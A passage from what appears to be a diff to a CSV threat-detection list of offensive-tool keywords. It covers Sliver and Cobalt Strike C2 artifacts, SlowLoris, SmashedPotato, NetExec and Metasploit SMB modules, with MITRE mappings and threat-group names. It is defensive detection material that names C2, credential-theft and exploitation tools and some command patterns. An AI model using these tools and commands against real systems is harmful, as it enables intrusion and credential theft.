Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*sleepmask.x64.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*sleepmask.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*sleepmask_pivot.x64.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*sleepmask_pivot.x86.o*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z"
+"*slemire/WSPCoerce*","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tools","https://github.com/slemire/WSPCoerce","1","0","N/A","9","3","203","29","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z"
+"*SlinkyCat.ps1*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*SlinkyCat-main*","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*Sliver C2 Session*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver.service*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver.sh/install*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver/.sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver:sliver*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver_pcap_parser.py*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver-client_linux*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver-client_macos*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver-client_windows.exe*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver-dns*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*SliverKeylogger*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z"
+"*sliverpb*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver-server daemon*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*sliver-server.*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z"
+"*SlowLoris*","offensive_tool_keyword","SlowLoris","Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this","T1498 - T1496 - T1490","TA0002 - TA0004 - TA0007","N/A","N/A","DDOS","https://github.com/gkbrk/slowloris","1","1","N/A","N/A","10","2172","671","2023-05-05T19:21:29Z","2015-04-26T10:00:33Z"
+"*slowloris.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*SluiEOP.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*smartbrute *kerberos*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*SmashedPotato.cs*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z"
+"*SmashedPotato.exe*","offensive_tool_keyword","SmashedPotato","A modification of @breenmachine original Hot Potato Priv Esc Exploit","T1059 - T1134 - T1201 - T1518","TA0002 - TA0004 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/SmashedPotato","1","1","N/A","N/A","1","81","35","2016-01-29T14:31:18Z","2016-01-20T20:49:08Z"
+"*smb * -u * -p * * -M bh_owned*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*smb * -u * -p * -M ioxidresolver*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*smb.dcsync*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*smb/impacket*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb/relay/ntlm*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_doublepulsar_rce.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_enumshares*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_enumshares.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_enumusers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_enumusers.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_enumusers_domain.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_eternalblue*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*smb_ms17_010_pass*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*smb_pipename_stager*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z"
